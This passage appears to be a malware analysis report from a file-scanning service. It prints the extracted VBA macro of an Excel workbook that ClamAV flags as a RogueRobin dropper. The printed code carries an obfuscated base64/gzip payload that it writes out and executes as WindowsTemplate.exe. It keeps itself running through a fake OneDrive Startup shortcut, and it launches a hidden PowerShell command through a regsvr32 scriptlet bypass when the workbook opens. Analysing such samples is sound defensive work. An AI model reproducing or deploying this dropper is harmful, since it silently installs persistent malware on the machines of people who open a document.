str = str + "IQlC9dozDzeIkameI2hWkL/WOIB56g3t8TExzi9hRggNpNYf3BDApcItadVMohe5b7a2dQEmWa+XLeIyIIWq38Wb0bANTUf0hjNMZ"
str = str + "0GfwTnBf4kWatJgRs8BjERZ78cZmkuuII6NiHnXgF2ELUWCw8jJdlNuOltVMcesztvrtyB9EnuAo6ySJ/qAfDliQ6zjZ0Rp7e1EhR"
str = str + "8DqbVhKd1aMW1whkXs/bGgXyo5CUuzOxbDYISyce0wcpX+Bw+rVIPOk0bC3kYP9ky6yxG1NuY4OoS9F/ej2HElE8uSZQ74kj34Jpu"
str = str + "Zm5KdZ20luh7hPoc+34+nkNpM8zlm2kMEymjZIR/Uz9A+1uvaL62B/N4PqLMpphkdF6Vf4bbDbetMpTnMate1tR8UmQBlogCTDlp+"
str = str + "0sDPL7Rj4PYmSWWic2qFRiItT0CrN0DuQoxl5B0pv4xkatXyEMn65+nm2jBTK5gCXeBU4d1qcupgz2UW7xZew5BUUfQq1pyw7ot6I"
str = str + "dVvEVrEFPZFPD54kMJvx7sYDL9Q6wn1L80hE0dYc2+w8z5Y5nrUkGWlGVFxfLKWZLoJj1khyTj/IObIZC3NXcxcdhkKYzXBP5Ej62"
str = str + "JF0QoQecTvgBDrZAeJO5Dcz1MOYTkC9SBN4bwMd4VJco8uqsQ25ySUTtB0KTENgmnA5PCcgiFTEDKhpUuZY/NNMlcIAFKbX5eqdsZ"
str = str + "wGtZXjYZtEvTwr+XL1XiqluK586G/HpMrCjLNW76JCuk+Jz4FrCpg0G6p0ICUnI5KSloYrzfUyKM/iPcP6m4G53V7Mm0V9UEqlCZ7"
str = str + "W0SX4RJmTF1gmyYXlYQbC3cHjITZfOhaX05vV80Yazc1sEb38LtiLtSzFu5ArWQjZzTYYLo3+Zsugt/Gy3E2f4h0xPFiUmmkBpeVX"
str = str + "cjmOqbwDyyctWHFrWYazT/7Hl1+CZUu3AydbKFuMXbxINqwsD1x2sCxU6FtJqssv4GglKBfdW2Rw4drKrr8LetoMCWZ5FOSIT/Myn"
str = str + "Ck6H3FjXByxjdUoj6xcXK5lxzBpLaxxq0aSl6Z5nj85Xnzj1ojOsPVNsksi96W42DquyrJsUbYOaZVTbLFkFXIJm2EJ0uxOTLYTg6"
str = str + "UV3YW69hpXsKzSXkmyRJFDDmWKq5NadZEfEXUjPPOp7/uY0xnmfFKI3THAcl5GLflneQZKPc2zLClgo2LKksHe6pUY1S6Mo3Dfjtq"
str = str + "Q1N0n6Fc46NmKpxtPLx6MgKMHzxY8p/BM44FzdqTxQA4HFi4HZoMD4Y7jFjxwtX6pv23UjyKM3lRPsXaoR+M8TrO8KJO9nLCsZppL"
str = str + "aImhURPhJLSdZpjqcFC2phyX4zE1uY9iMAGes1ye5HGQzn8TRj4OfdEvzQ3S4QygObwzzClpLeeTQvEeQIAxSoHFFU3sY5OWPdsla"
str = str + "0KPYrDCFrLeNf2s+Wnmmxa32loWFQNWUJLiMEqsW0nCW9i3okbdbaBrKvq5JuS2MUa4mqBJoe+x7LDYRriJNVMmU7XkUqrNdZPTqJ"
str = str + "VH+zQ7N+FX6qRdTPHCPmWFULNsywVPt4nttuAbN/EMT7N/3YS0m4ONtBVsbRJi8a07LZdZiBRzYozZziB+K1TdwVOFVuSNZezHLLP"
str = str + "YYRnEHJvsBLPfaC0bGdDlQHHSmvht3P22osraeGIQVODWxtPdtIyGloEDrECKzET1Tp7UFLfMsAmkaa/U+VJ6kbP1QwQpOt2DZ4zu"
str = str + "7x1ZWv/ytZf2TcaXpYVyzOoRGeVKZWUGsPiGKctDyDCsFBo18ZzJ8Lwhv9DC4ZLJYx21Vr5ueIdxMYDNBc0Fwk5zffKrowiwCyWF9"
str = str + "2FB289Rzu0DzR5A1wFH3q4ZpQPAHwV0BVpXFt/42yPaBE+mabRbEO63SG+n2IPPFUV7+2+PaIfBk6x6jufOAFo6WxTzdb9NYu4tiv"
str = str + "XgymKN/ofE2suL2hzqJJjDXNHdlwtzFNC+gjjdJWnsLVxuKRdB6s4Zy5OJxd95qR0aA9M8D9QBiD3PWyYZyexlxkZx01To9BGbSIN"
str = str + "LRBq1iYSObH2p3GkdipVivpRdetq8F+IxuzoOsESFFVgeRdxuxfil/u3jZWKCpduPXgwyJdVRKsgd2lrt282RQnwJ5+W4FvpNgzsv"
str = str + "lPARNnkZpSRkFFY3avW3EKVlud9YYNYchyQU/ZXcfTFmdRxfoTwDDLiObEXfB/H0oHQIMXAc6VbEURTT90AzvTDEONJ+5Lo4wu9lq"
str = str + "Af4XsbvYkipG+WRkRN1FsvK1YIOGRCrr+uAnk5Ye0naTm/mjfmUFQ1hd9TYwfJN2uQrK29OWlou3ystoYpfunc0eKeVZu5L2zQu3+"
str = str + "b6gu5TvKxKvS/lkYMO51fm0bBczzO8nGJsmpcrLd9551iOpW1cQuPaiwkvHP1CePuF/BXhDWIDxoYOdUfhDCgndErH4MMOFTAO7IU"
str = str + "d4OBAROuYw3MaAcuN4B4H/5uEot8obrZytMMCxpEEFXZODsTHNyqb2ppj+eF3PvnO6vOv2v5j4YwqiscRxc4CgK5TNkSJqiGpWrxv"
str = str + "tbuqakPV3lBIVauu9zhCoVDVoaqox+OpOuaKqnijbsglVBSoGgGANEF0xEYFRgk1hNzCSRiUgAuX1HsIPhQKob4HbRPzqFBdUVG1+"
str = str + "Ha0XbX4uAevhlCDQyOmlR6ngGhoU6mvlbI9DTae+og7GKpKVB2rSqGdUKjB1RCqGvaEvFEVdUP64vucYJkA73rqVj3kaXBJqVxgRm"
str = str + "IKUXUMbRBGo440hIKVitKwVlRXLX5aWSscPkVWqPcD77GwYNtQL+nrSTSPw614vJWK6kHNtcLr1og5ekv/+LiL2Nevcusej1q118O"
str = str + "68NBLRfOKhxQSor4B6XPLYpR1ujeiLyHSEgocBF7vIfkkBWkSIIqrDjUQBBqf4gAvh4cYetCqFvJ43S7QpkNVN7Fyz/Ng1TP8Lbfb"
str = str + "GYA8AaniACmU9BwIuNw0hBA9VOH2cmsNVTOeqhn9lCag+p9AWAEMlKCfCrsrPWpIlUJDNKif2lfrNTdG3eMIuD0QnaX2sLbTUBU0C"
str = str + "gFewMhjODS3o8HlIetxhcgYMBJuRmFE3GrVHA2VqLpLodEPhdxI9btAGQUJmpvzoYcYd/xSWQNlrDJUdBOCU9XjdlaNABeCRF7SIe"
str = str + "wmRQOgwTCVkH6Xl4S6K8ijFfJQR+/T79JRVg/I86e3Hj9c1/PN+zA5OoQi1C7hpH/2QlmthB1aA8zfo2qqQ6saxjOCZwOMBgZMd6n"
str = str + "JTjBEchqoKiaIIode5SkxbM0ZVQWKyBwKDShNk5DDI0Iexfofe62lv/kYUyNHzMTsPiNb/Og/Nm0aZ3IK6OT/z6tCET7bV0kh/86n"
str = str + "RhFVxWst0U88GY12dXRiG3+lIjYkO5Obe7Zs7oh39CY74z0nUpPxxIktifjWzT19E6nNnalEDxxgQBHuzvYO+hVityJWt+8bHiteC"
str = str + "2qzrpPsoL+MgpyhVcUi6+Yf3XaopDrRYkm0B1L/vbxwqFg3EAE8X8D8sAA86+aLikRDAu/q6948NNjVGe8c3NUR7+wc6oj3Dw30xT"
str = str + "s6Bjt6dg1t7u3vGJCUXT0Dw5v7uzviw0O7homyKz7Q190Nys6OnoHuLZsH+3ZJyp7Ovo6eno6O+MBwZy9Rdsf7u3oHLMqh7s0dffT"
str = str + "RB6NRvElml6X78rKMK+IG64um/HDcFi3cGWyLFlTXI7XbFh2cy9DlsR3Z1FzeTGTaogfmJjLp5HWp+THjZCq7Y2Lr1sTm5OYtnX3d"
str = str + "PamO3j6pucL/047MgP6+P/8gHkOIg6NDo+LvGqv6b9o99MZzLQeUjQ++lzQ5uO043YPLHT+TzmTSiZnjQ0ZSfgQ/fjidm0tkoqP5u"
str = str + "cm0QZay+bhlT7njJduyg8bELccPpjKpRC5lQ7fPThb+ou238+cDD5XgLxX+n3/L/HzqIXtufNAwh8+m+IYQD2Mq1T6ZyXDZxWYRve"
str = str + "a/Rtj/535U/jvIKHYstYL/3fzF8nL5N2+9y+DpZwmySD+9Av2H4U0efkyINkeppI2OMLEZHMWWonzDOI73PoRk/MdI4iPOH75Y/L8"
str = str + "U2njutHJOsfQGthBDjDvMYeku6yBshL/FGVy+gWuNWUefOd7oFI/u+Ocp5wP8dzKjfBqU5i+Fl3KaZpqO4m8PNjxwVWI162PQOsIu"
str = str + "nnDxT5OtrLCR2WedkhV+rhZ+0BTaG+LgNclyzJbJOYSao9a26RZrk0Q/HVi4SvUPW7vWUr1OBMcdxYfaqwD9yJItU0mq5dopbp0E/"
str = str + "T8lq1B/D3JTXJN6N4t+mfztc5qluhQXFU/yF9Mu/kBHf2jXwrop8ZEjNMlbVrm9yxV1tItl3m/xS1syF/qcfcmyb2Fdy3L6Qk3l9v"
str = str + "FYScc9rOPyeks1vVTPvVynn7e3Kd4eZ3gb/qvqPfNWIf7eZuQ//NBHt+88O5OJnrbWryaEB03RlHXfdEfTobFd8d6maI5v+GSMbGp"
str = str + "H03wq17Tz6qAv6NuesG7URsEim9vRNGdmt+WS06mZRC4+k06aRs44kY8njZltidxM++nOpuhMIps+kcrlD9vbA7NotMhM3g/Oz5fJ"
str = str + "RL9NUbrIvaNp73z/7GzGusrdnpidbdokOeTNuRzfknyJ8nTJllEzl0rOmWjTygNj3axKTR4w06fTmdRUKvcSuXY3FbnY+cirw5B4T"
str = str + "+p0KhPNULqjKZEbyZ5GQGA2RefS/Xz3bUcT3+W1OsVMNi0jTUH0TWWyb99UVALy2zcVlHq1+M/7WZR/P//d/0ye///n/5qffwfNRy"
str = str + "H6AHoAAA=="";$byteArray = [System.Convert]::FromBase64String($content);$input = New-Object System.IO.M"
str = str + "emoryStream( ,$byteArray );$output = New-Object System.IO.MemoryStream;$gzipStream = New-Object Syste"
str = str + "m.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress);$gzipStream.CopyTo"
str = str + "( $output );$gzipStream.Close();$input.Close();[byte[]] $byteOutArray = $output.ToArray();[System.IO."
str = str + "File]::WriteAllBytes(""$env:APPDATA\Microsoft\Windows\Templates\WindowsTemplate.exe"",$byteOutArray);ie"
str = str + "x ""$env:APPDATA\Microsoft\Windows\Templates\WindowsTemplate.exe"";$target = ""$env:APPDATA\Microsoft\Wi"
str = str + "ndows\Templates\WindowsTemplate.exe"";$path = ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Star"
str = str + "tup\OneDrive.lnk"";$wshshell = New-Object -ComObject WScript.Shell;$link = $wshshell.CreateShortcut($p"
str = str + "ath);$link.TargetPath = $target;$link.Save();"
Set Oshell = CreateObject("WScript.Shell")
temp_dir = Oshell.ExpandEnvironmentStrings("%TEMP%")
ps_file_dir = temp_dir + "\WINDOWSTEMP.ps1"
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile(ps_file_dir, 2, True)
objFileToWrite.WriteLine (str)
objFileToWrite.Close
Set objFileToWrite = Nothing
Dim powershell_command As String
powershell_command = "powershell.exe -noexit -exec bypass -File " + ps_file_dir
powershell_command = Replace(powershell_command, "\", "\\")
Dim sct_file As String
sct_file = "<?XML version=""1.0""?>" + vbCrLf
sct_file = sct_file + "<scriptlet>" + vbCrLf
sct_file = sct_file + "<registration" + vbCrLf
sct_file = sct_file + "progid = ""PoC""" + vbCrLf
sct_file = sct_file + "classid=""{F0001111-0000-0000-0000-0000FEEDACDC}"" >" + vbCrLf
sct_file = sct_file + "<script language=""JScript"">" + vbCrLf
sct_file = sct_file + "<![CDATA[ var r = new ActiveXObject(""WScript.Shell"").Run(""" + powershell_command + """,0,true); ]]>" + vbCrLf
sct_file = sct_file + "</script>" + vbCrLf
sct_file = sct_file + "</registration>" + vbCrLf
sct_file = sct_file + "</scriptlet>" + vbCrLf
Dim sct_file_path As String
sct_file_path = temp_dir + "\12-B-366.txt"
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile(sct_file_path, 2, True)
objFileToWrite.WriteLine (sct_file)
objFileToWrite.Close
Set objFileToWrite = Nothing
'sct_file_path = Replace(sct_file_path, "\", "\\")
Dim final_command As String
final_command = "regsvr32.exe /s /n /u /i:" + sct_file_path + " scrobj.dll"
Call Shell(final_command, vbHide)
End Sub
Private Sub Workbook_Open()
New_Macro
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 62464 bytes |
SHA-256: b6393af0c82176f97c95e1afcf0d1980acc8432945df8bf2352580aadd2e1220 |
|||
|
Detection
ClamAV:
Doc.Dropper.RogueRobin-6826034-0
Obfuscation or payload:
likely
1442 of 2499 identifiers look randomly generated (e.g. 'Ck6H3FjXByxjdUoj6xcXK5lxzBpLaxxq0aSl6Z5n'); 10 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.